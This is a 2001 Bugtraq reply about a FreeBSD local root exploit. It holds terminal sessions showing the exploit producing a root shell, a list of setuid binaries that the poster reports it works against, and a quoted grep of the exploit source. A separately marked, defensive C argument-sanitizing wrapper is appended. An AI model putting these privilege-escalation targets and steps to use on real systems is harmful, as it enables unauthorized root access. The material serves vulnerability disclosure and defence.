[21509] in bugtraq
Re: FreeBSD 4.3 local root
daemon@ATHENA.MIT.EDU (Matias Sedalo)
Mon Jul 16 00:29:37 2001
Date: Sun, 15 Jul 2001 07:17:36 -0400 (ART)
From: Matias Sedalo <s0t4ipv6@shellcode.com.ar>
Cc: bugtraq@securityfocus.com
In-Reply-To: <049201c10a05$5dc17bc0$2001a8c0@clitoris>
Message-ID: <Pine.LNX.4.21.0107150717070.2115-100000@mother.xunil.com.ar>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

one@c0d4:/usr/home/c0d4$ uname
FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE
one@c0d4:/usr/home/c0d4$ ./sig2
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe89
child=1371
login: # done
# id
uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff)
#

and with: /usr/bin/chfn; /usr/bin/chsh; /usr/bin/ypchpass; /usr/bin/ypchfn; /usr/bin/ypchsh; /usr/bin/keyinit; /usr/bin/login; /usr/bin/passwd; /usr/libexec/sendmail/sendmail; /usr/local/bin/kcheckpass; /usr/local/bin/icmpinfo
gave me a suid shell too.

On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote:
> > Well, after a bunch of tests I've found only two suids which gave me
> > suid shell:
> > /usr/bin/passwd
> > /usr/local/bin/ssh1
>
> /usr/bin/su also works for me:
>
> riget:venglin:~> egrep -e execl vvfreebsd.c
> if(!execl("/usr/bin/su","su","szymon",0))
>
> riget:venglin:~> ./v
> vvfreebsd. Written by Georgi Guninski
> shall jump to bfbffe72
> child=57660
> Password:done
> # id
> uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
>
> > So, quick workaround should be
>
> Quick workaround is to limit arguments and environment and to filter non-ASCII
> characters:
>
> http://www.frasunek.com/sources/security/rexec/
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
>
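The quoted "quick workaround" (limit arguments, limit the environment, filter non-ASCII characters) is the kind of check a small exec wrapper placed in front of a setuid binary can enforce. The C program below is an added illustration of that idea and is not code from this thread or from the rexec sources at frasunek.com; the function names, the limits (MAX_ARGS, MAX_ARG_LEN), the fixed environment contents and the demo inputs are all assumptions made here.

```c
/* Added example, not code from the thread or from frasunek.com: a minimal
 * exec wrapper of the kind the quoted "quick workaround" describes.  It caps
 * the number and length of arguments, rejects any byte outside printable
 * 7-bit ASCII, and replaces the inherited environment with a short fixed one
 * before calling execve().  Names and limits are assumptions. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_ARGS    16    /* assumed cap on argument count (excluding NULL) */
#define MAX_ARG_LEN 256   /* assumed cap on the length of one argument      */

/* Fixed environment handed to the target instead of the caller's own. */
static char *const clean_env[] = {
    "PATH=/bin:/usr/bin",
    "SHELL=/bin/sh",
    NULL
};

/* 1 if every byte of s is printable 7-bit ASCII (0x20..0x7e), else 0. */
int is_printable_ascii(const char *s)
{
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c > 0x7e)
            return 0;
    }
    return 1;
}

/* Validate a NULL-terminated argv.  Returns 0 when it passes, -1 when it is
 * empty or has more than MAX_ARGS entries, or the 1-based index of the first
 * argument that is too long or contains a non-printable/non-ASCII byte. */
int sanitize_argv(char *const argv[])
{
    int n;
    if (argv == NULL || argv[0] == NULL)
        return -1;
    for (n = 0; argv[n] != NULL; n++) {
        if (n >= MAX_ARGS)
            return -1;
        if (strlen(argv[n]) > MAX_ARG_LEN || !is_printable_ascii(argv[n]))
            return n + 1;
    }
    return 0;
}

/* Number of entries in the fixed environment (without the terminating NULL). */
int clean_env_count(void)
{
    int n = 0;
    while (clean_env[n] != NULL)
        n++;
    return n;
}

/* Run `path` with a checked argv and the fixed environment.  Returns -1 if
 * the arguments are rejected or execve() fails; does not return on success. */
int exec_sanitized(const char *path, char *const argv[])
{
    int rc = sanitize_argv(argv);
    if (rc != 0) {
        fprintf(stderr, "refusing to exec %s: bad argument set (code %d)\n", path, rc);
        return -1;
    }
    execve(path, argv, clean_env);
    perror("execve");
    return -1;
}

/* Constructed inputs for demonstration (not taken from the thread). */
int demo_ok(void)
{
    char *argv[] = { "su", "someuser", NULL };
    return sanitize_argv(argv);              /* expected 0 */
}

int demo_non_ascii(void)
{
    char *argv[] = { "su", "\xcc\xcc\xcc", NULL };
    return sanitize_argv(argv);              /* expected 2: high bytes in argv[1] */
}

int demo_too_long(void)
{
    char big[MAX_ARG_LEN + 2];
    char *argv[] = { "su", big, NULL };
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return sanitize_argv(argv);              /* expected 2: argv[1] over the cap */
}

int demo_too_many(void)
{
    char *argv[MAX_ARGS + 2];
    int i;
    for (i = 0; i < MAX_ARGS + 1; i++)
        argv[i] = "x";
    argv[MAX_ARGS + 1] = NULL;
    return sanitize_argv(argv);              /* expected -1: too many entries */
}

int main(void)
{
    /* Stand-alone usage: exec a harmless target through the wrapper. */
    char *argv[] = { "id", NULL };
    return exec_sanitized("/usr/bin/id", argv) == -1 ? 1 : 0;
}
```

The wrapper never passes the caller's environment through, so anything smuggled into it is dropped rather than filtered, and argument screening happens before the privileged target ever sees the data.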